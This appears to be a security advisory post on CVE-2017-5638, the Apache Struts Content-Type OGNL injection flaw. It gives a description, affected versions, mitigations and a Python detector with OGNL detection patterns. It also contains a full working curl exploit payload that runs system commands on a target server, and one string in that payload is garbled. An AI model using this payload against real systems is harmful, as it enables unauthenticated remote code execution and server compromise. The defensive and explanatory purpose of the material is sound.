How CVE-2017-5638 works:
CVE-2017-5638 is a flaw in the Jakarta Multipart parser of Apache Struts. The exploit sends a maliciously crafted `Content-Type` HTTP header value in a file upload request. The parser's error handling does not validate this header: when parsing the upload raises an exception, the error message is built from the user-supplied header value without adequate sanitization. This lets an attacker place Object-Graph Navigation Language (OGNL) expressions in that error message (which also ends up in the server's log), and the vulnerable Struts component then evaluates those expressions on the server side. Because OGNL expressions can execute arbitrary system commands, the vulnerability gives unauthenticated remote attackers a direct path to command execution with the privileges of the Struts application server, leading to complete system compromise.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: 2017-03-20
What Undercode Says:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`
How the exploit works:
The attacker crafts a malicious `Content-Type` header containing an OGNL expression that runs a command, then sends an HTTP request with this header to a vulnerable Struts endpoint. The server evaluates the expression and executes the embedded system command, giving the attacker a remote shell.
Protection against this CVE:
Immediately upgrade to Struts 2.3.32 or 2.5.10.1, which contain the fix. Put a Web Application Firewall (WAF) in front of the application to filter requests whose `Content-Type` header carries OGNL syntax instead of a media type. If upgrading is impossible, switch from the Jakarta parser to a different multipart parser such as the Cos or Pell multipart handlers.
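The two defensive checks above, a version test against the affected ranges and a filter that flags `Content-Type` values carrying OGNL syntax rather than a media type, as an added example that is not part of the original post; the key=value log layout and the sample log lines are constructed for the example, and a WAF would apply `inspect_content_type` to the decoded header value.

```python
import re

# Affected Struts ranges listed on this page (inclusive); fixed in 2.3.32 / 2.5.10.1.
AFFECTED_RANGES = [((2, 3, 5), (2, 3, 31)), ((2, 5, 0), (2, 5, 10))]

def parse_version(v):
    """'2.5.10.1' -> (2, 5, 10, 1); a short string like '2.5' is padded to three parts."""
    parts = tuple(int(p) for p in v.strip().split("."))
    return parts + (0,) * max(0, 3 - len(parts))

def is_affected(version):
    """True if this Struts version lies inside a CVE-2017-5638 affected range."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)

# A legitimate media type: type/subtype plus optional ';name=value' parameters.
MEDIA_TYPE = re.compile(r'^[\w.+-]+/[\w.+-]+(\s*;\s*[\w.-]+=("[^"]*"|[^;"]*))*\s*$')
# Tokens that belong to OGNL and never to a MIME type: expression braces, #variables,
# @class@ static references, and the member-access / process-spawning names.
OGNL_MARKERS = re.compile(r"[%$]\{|#\w+|@[\w.]+@|_memberAccess|ProcessBuilder|getRuntime")

def inspect_content_type(value):
    """Reasons a Content-Type value looks like an OGNL injection attempt ([] if clean)."""
    reasons = []
    if not MEDIA_TYPE.match(value):
        reasons.append("not a well-formed media type")
    hit = OGNL_MARKERS.search(value)
    if hit:
        reasons.append("OGNL marker %r" % hit.group(0))
    return reasons

# Constructed log lines (not real traffic) in a key=value layout assumed for this example.
LOG_LINE = re.compile(r'src=(\S+) method=(\S+) path=(\S+) content_type="(.*)"$')
SAMPLE_LOG = [
    'src=10.0.0.5 method=POST path=/upload.action content_type="multipart/form-data; boundary=----abc123"',
    'src=198.51.100.7 method=POST path=/upload.action content_type="%{(#_=\'multipart/form-data\').(#x=1)}"',
    'src=203.0.113.9 method=GET path=/index.action content_type="application/x-www-form-urlencoded"',
]

def scan_log(lines):
    """Return (src, path, reasons) for every request whose Content-Type is suspicious."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            src, _method, path, ctype = m.groups()
            reasons = inspect_content_type(ctype)
            if reasons:
                findings.append((src, path, reasons))
    return findings
```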
Impact:
Complete system compromise. Unauthenticated remote code execution. Data theft, server hijacking, and deployment of ransomware or other malware.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode